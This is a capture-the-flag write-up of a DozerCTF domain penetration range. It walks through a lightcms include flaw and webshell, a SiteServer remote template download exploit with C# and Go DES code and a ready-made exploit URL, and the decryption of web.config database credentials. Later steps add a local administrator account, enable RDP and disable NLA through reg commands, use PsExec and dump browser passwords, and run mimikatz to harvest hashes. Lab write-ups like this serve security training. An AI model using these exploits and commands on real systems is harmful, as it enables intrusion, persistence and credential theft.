DozerCTF Domain Penetration
flag1
After XCTF final I noticed that dozer was also running a competition, and one of its challenges was a penetration box that seemed worth studying in detail.
On entering, the site turned out to be lightcms.
That recalled the challenge Guo Yuanshi set at the Red Hat Cup a few days earlier.
First, log in to the admin backend with dozer/dozer123.
An arbitrary file read vulnerability for lightcms can be found on GitHub.
With arbitrary file read available, we read the file the original vulnerability lived in
and find that this build has an extra method, testInclude:
public function testInclude(Request $request)
{
    // 'file' comes straight from the request and is appended to a fixed prefix;
    // nothing strips "../", so any readable path on the server can be included
    $file = $request->has('file') ? $request->get('file') : 'index.php';
    @include('/var/www/html/public/'.$file);
}
Because the prefix is simply concatenated with the unfiltered file parameter, a jpg carrying a webshell can be fetched over HTTP and then included through this method; include() executes the PHP inside it regardless of the extension,
which gives a shell.
flag1:Dozerctf{k94jf8ejdbzks2l4o40rjdnfewrkyosd}
flag2
Next, upload a viper payload and let it check in with viper. Once it is online, add a route and proxy through the host to scan the intranet.
Inside, a machine at .234 is found.
Visiting http://10.10.1.234/robots.txt
returns
User-agent: *
Disallow: /SiteServer/
Disallow: /SiteFiles/
Disallow: /home/
which indicates SiteServer.
Looking up SiteServer vulnerabilities gives
https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell
Upload the template zip containing the webshell to the jump host
and start another HTTP server there.
The downloadUrl parameter has to be DES-encrypted with SiteServer's key first:
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace EncryptApplication
{
    class Encrypt
    {
        static void Main(string[] args)
        {
            // SiteServer's default secret key; only its first 8 bytes become the DES key
            var _encryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
            // URL of the template zip served from the jump host
            var _inputString = "http://10.10.1.47:9001/poxteam.zip";
            // fixed IV used by SiteServer's encryptor
            byte[] iv = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
            try
            {
                var byKey = Encoding.UTF8.GetBytes(_encryptKey.Length > 8 ? _encryptKey.Substring(0, 8) : _encryptKey);
                var des = new DESCryptoServiceProvider();   // defaults: CBC mode, PKCS7 padding
                var inputByteArray = Encoding.UTF8.GetBytes(_inputString);
                var ms = new MemoryStream();
                var cs = new CryptoStream(ms, des.CreateEncryptor(byKey, iv), CryptoStreamMode.Write);
                cs.Write(inputByteArray, 0, inputByteArray.Length);
                cs.FlushFinalBlock();
                var _outString = Convert.ToBase64String(ms.ToArray());
                Console.WriteLine("DesEncrypt:");
                Console.WriteLine(_outString);
            }
            catch (Exception error)
            {
                // report instead of silently swallowing the failure
                Console.WriteLine("Error: " + error.Message);
            }
        }
    }
}
Then make the result URL-safe with a python script that applies the same character substitutions SiteServer expects in the query string:
# base64 ciphertext produced by the C# program above
str_decry = "ZjYIub/YxA05+dg8BqV7gWPgR82cOjhyE6hgZjPTM3/iCxJzxSm/yQ=="
# replace the characters that would break or be mangled in the query string
str_decry = (str_decry.replace("+", "0add0")
                      .replace("=", "0equals0")
                      .replace("&", "0and0")
                      .replace("?", "0question0")
                      .replace("/", "0slash0"))
print(str_decry)
Finally visit http://10.10.1.234//SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=ZjYIub0slash0YxA050add0dg8BqV7gWPgR82cOjhyE6hgZjPTM30slash0iCxJzxSm0slash0yQ0equals00equals0&directoryName=yang99
Then visit the backdoor it extracted,
which is now online,
and we get the second flag.
flag2:DozerCTF{b59d9f9e843dedb09e407849f3396cb1}
flag3
Look at web.config:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<appSettings>
<add key="IsProtectData" value="True" />
<add key="DatabaseType" value="9XtLPj6oytMAr6M9jZ0Xvg0equals00equals0" />
<add key="ConnectionString" value="Zg3p37CSquO0slash0DelgBGFVO0J0BlhMxqbj6HR98UP8h4kojeoW8A0slash0xZh4im63w0tn2nuW7n5XRcDo0equals0" />
</appSettings>
<system.web>
<httpRuntime requestValidationMode="2.0" requestPathInvalidCharacters="" maxRequestLength="40960" executionTimeout="2000" useFullyQualifiedRedirectUrl="false" minFreeThreads="8" minLocalRequestFreeThreads="4" appRequestQueueLimit="100" enableVersionHeader="false" />
<pages validateRequest="false" enableSessionState="true" enableViewState="true" enableEventValidation="false" controlRenderingCompatibilityVersion="4.0" clientIDMode="AutoID" />
<customErrors mode="Off" />
<sessionState mode="InProc" timeout="30" />
<trace enabled="false" requestLimit="1000" pageOutput="true" traceMode="SortByTime" localOnly="true" />
<globalization fileEncoding="utf-8" requestEncoding="utf-8" responseEncoding="utf-8" />
<compilation debug="false" />
</system.web>
<system.webServer>
<modules>
<!--workaround: iisnode does not support PUT and DELETE by default-->
<remove name="WebDAVModule" />
<!--remove the routing module and add it back once-->
<remove name="UrlRoutingModule-4.0" />
<add name="UrlRoutingModule-4.0" type="System.Web.Routing.UrlRoutingModule" preCondition="" />
<add name="ErrorRedirectModule" type="SiteServer.API.ErrorRedirectModule, SiteServer.API" />
</modules>
<handlers>
<remove name="ExtensionlessUrlHandler-Integrated-4.0" />
<remove name="OPTIONSVerbHandler" />
<remove name="TRACEVerbHandler" />
<add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="*" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
</handlers>
</system.webServer>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-9.0.0.0" newVersion="9.0.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Http" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Net.Http.Formatting" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.Owin" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-2.1.0.0" newVersion="2.1.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Cors" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.AspNet.SignalR.Core" publicKeyToken="31bf3856ad364e35" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-2.2.1.0" newVersion="2.2.1.0" />
</dependentAssembly>
</assemblyBinding>
</runtime>
</configuration>
IsProtectData is True, so decrypt the DatabaseType and ConnectionString values with DES using the same key,
which gives server=10.10.1.231;uid=sa;pwd=msO.9uXC;database=site
Log in to the MSSQL server with msf first,
then execute a command through it;
the flag is on Administrator's desktop.
That is the third flag.
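As an added example (not code from the writeup or from SiteServer), the following Go program puts both cryptographic steps of this section in one place: the DES-CBC/PKCS7 encryption and URL-safe token substitution that produce the downloadUrl parameter for SiteTemplateDownload, and the reverse path that decrypts the IsProtectData values from web.config. The key and IV are copied from the C# program above; that the web.config values were protected with that same default key is the writeup's assumption. A wrong key surfaces as a padding error rather than as garbage, which is how the check fails safely.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// Key and IV copied from the C# encryptor above (SiteServer's default secret key;
// only its first 8 bytes become the DES key). DESCryptoServiceProvider defaults
// to CBC mode with PKCS7 padding, which is what is reproduced here.
const secretKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5"

var iv = []byte{0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF}

// desKey mirrors the C#: use the first 8 bytes of the secret key.
func desKey(key string) []byte {
	if len(key) > 8 {
		key = key[:8]
	}
	return []byte(key)
}

func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("ciphertext is not block aligned")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("bad padding (wrong key?)")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding (wrong key?)")
		}
	}
	return b[:len(b)-n], nil
}

// DesEncrypt reproduces the page's C# program: DES-CBC, PKCS7 padding, base64 output.
func DesEncrypt(plain, key string) (string, error) {
	block, err := des.NewCipher(desKey(key))
	if err != nil {
		return "", err
	}
	padded := pkcs7Pad([]byte(plain), block.BlockSize())
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// DesDecrypt is the inverse, used for the IsProtectData values in web.config.
func DesDecrypt(b64, key string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	block, err := des.NewCipher(desKey(key))
	if err != nil {
		return "", err
	}
	if len(raw) == 0 || len(raw)%block.BlockSize() != 0 {
		return "", errors.New("ciphertext is not block aligned")
	}
	out := make([]byte, len(raw))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, raw)
	plain, err := pkcs7Unpad(out, block.BlockSize())
	if err != nil {
		return "", err
	}
	return string(plain), nil
}

// SiteServer's query-string-safe spelling of base64 (the same substitutions the
// python script above makes) and its inverse.
var toToken = strings.NewReplacer("+", "0add0", "=", "0equals0", "&", "0and0", "?", "0question0", "/", "0slash0")
var fromToken = strings.NewReplacer("0add0", "+", "0equals0", "=", "0and0", "&", "0question0", "?", "0slash0", "/")

// EncryptForUrl yields the downloadUrl parameter value for SiteTemplateDownload.
func EncryptForUrl(plain string) (string, error) {
	b64, err := DesEncrypt(plain, secretKey)
	if err != nil {
		return "", err
	}
	return toToken.Replace(b64), nil
}

// DecryptConfigValue turns a web.config value written with IsProtectData=True back into plaintext.
func DecryptConfigValue(token string) (string, error) {
	return DesDecrypt(fromToken.Replace(token), secretKey)
}

func main() {
	param, err := EncryptForUrl("http://10.10.1.47:9001/poxteam.zip")
	fmt.Println("downloadUrl =", param, err)
	// The two protected values from the web.config shown above.
	for _, v := range []string{
		"9XtLPj6oytMAr6M9jZ0Xvg0equals00equals0",
		"Zg3p37CSquO0slash0DelgBGFVO0J0BlhMxqbj6HR98UP8h4kojeoW8A0slash0xZh4im63w0tn2nuW7n5XRcDo0equals0",
	} {
		plain, err := DecryptConfigValue(v)
		fmt.Println(plain, err)
	}
}
```

The token substitution is applied after base64 encoding and reversed before base64 decoding; the same program therefore works for any SiteServer parameter or config value that went through this encryptor, not only the two shown on the page.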
flag4
Then add a user and put it in the local Administrators group:
net user yang99 test@123.com /add
net localgroup Administrators yang99 /add
Enable RDP on port 3389:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
If the connection still errors, disable Network Level Authentication on RDP-Tcp as well:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Then connect over Remote Desktop.
On Administrator's desktop there is
DozerOCS; analysing its memory yields the credential Alice / FkuWvj08.
Use this account to log in to 10.10.1.121.
Since that personal PC does not have 3389 open, PsExec64.exe is used to reach Alice's PC instead (PsExec needs SMB reachable and a credential with local administrator rights on the target).
The fourth flag is on Alice's desktop.
flag5
Then upload hack-browser-data.exe and dump ALICE's browser data.
It contains a saved password:
Alice Alice@Dozer@2021
Log in to the backend,
write a shell and read the flag.
Add a user, connect, and run mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt
which yields the hashes.